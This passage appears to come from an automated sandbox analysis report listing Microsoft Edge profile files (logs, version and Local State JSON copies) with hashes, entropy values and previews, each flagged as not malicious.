                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............#;..;...............#38_h.......6.Z..W.F.....s.8.....s.8..........V.e................V.e................p...0................39_config..........6.....n ...1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.263776333834036
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQp+q2PN723oH+TcwtfrK+IFUt8OPQFZmw+OPQgNVkwON723oH+TcwtfrUeLJ:7okvVaYeb23FUt8OoF/+Oos5OaYeb3J
                                                                                                                                                                                                                  MD5:BF46BABC77C1F923039067E327F1C29D
                                                                                                                                                                                                                  SHA1:659632C2294556E51490D87ED12C718B0D15E023
                                                                                                                                                                                                                  SHA-256:0658413E642E0569AC5C59FCE1208930D3E397F0FAC18E6AB1FC9976B9D16203
                                                                                                                                                                                                                  SHA-512:D35CD99D7664244702C40CC5D8C6152777828EE1A52A8F44C8338DE88EACE7650D779A25E1698C316BB8C2161174D461EA5C31B3ABCCC8CC6B87FEB20ACE7FE5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.375 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-15:06:09.375 1e48 Recovering log #3.2024/12/18-15:06:09.376 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.263776333834036
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQp+q2PN723oH+TcwtfrK+IFUt8OPQFZmw+OPQgNVkwON723oH+TcwtfrUeLJ:7okvVaYeb23FUt8OoF/+Oos5OaYeb3J
                                                                                                                                                                                                                  MD5:BF46BABC77C1F923039067E327F1C29D
                                                                                                                                                                                                                  SHA1:659632C2294556E51490D87ED12C718B0D15E023
                                                                                                                                                                                                                  SHA-256:0658413E642E0569AC5C59FCE1208930D3E397F0FAC18E6AB1FC9976B9D16203
                                                                                                                                                                                                                  SHA-512:D35CD99D7664244702C40CC5D8C6152777828EE1A52A8F44C8338DE88EACE7650D779A25E1698C316BB8C2161174D461EA5C31B3ABCCC8CC6B87FEB20ACE7FE5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.375 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-15:06:09.375 1e48 Recovering log #3.2024/12/18-15:06:09.376 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):816
                                                                                                                                                                                                                  Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                  MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                  SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                  SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                  SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                  Entropy (8bit):5.23546134021952
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ1+q2PN723oH+TcwtfrzAdIFUt8OPQMXZmw+OPQM3VkwON723oH+TcwtfrzILJ:7oAvVaYeb9FUt8OoMX/+OoMF5OaYeb2J
                                                                                                                                                                                                                  MD5:72508F0EC1271E02BF24519153DA77AD
                                                                                                                                                                                                                  SHA1:6B0145FC957797867EC4D78F38A02D4AA20C15A9
                                                                                                                                                                                                                  SHA-256:7E7D9F36439CF53400662E512605757EAAB2A5869628F2D5839AF725C1456025
                                                                                                                                                                                                                  SHA-512:A4323DD13FC4FFCA3A1D5C2B6094658910370ED51E4319ED533DBB9F2831B89B08D1C2F6AF422B5CBDE446B77C1FA03A30C92A1EEA16B4AC96543DA6E85ADDEF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.371 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-15:06:09.372 1e48 Recovering log #3.2024/12/18-15:06:09.372 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                  Entropy (8bit):5.23546134021952
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ1+q2PN723oH+TcwtfrzAdIFUt8OPQMXZmw+OPQM3VkwON723oH+TcwtfrzILJ:7oAvVaYeb9FUt8OoMX/+OoMF5OaYeb2J
                                                                                                                                                                                                                  MD5:72508F0EC1271E02BF24519153DA77AD
                                                                                                                                                                                                                  SHA1:6B0145FC957797867EC4D78F38A02D4AA20C15A9
                                                                                                                                                                                                                  SHA-256:7E7D9F36439CF53400662E512605757EAAB2A5869628F2D5839AF725C1456025
                                                                                                                                                                                                                  SHA-512:A4323DD13FC4FFCA3A1D5C2B6094658910370ED51E4319ED533DBB9F2831B89B08D1C2F6AF422B5CBDE446B77C1FA03A30C92A1EEA16B4AC96543DA6E85ADDEF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.371 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-15:06:09.372 1e48 Recovering log #3.2024/12/18-15:06:09.372 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                  Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                  MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                  SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                  SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                  SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:117.0.2045.55

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36e5b.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36e6b.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3705f.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39701.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c3fd.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48180.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
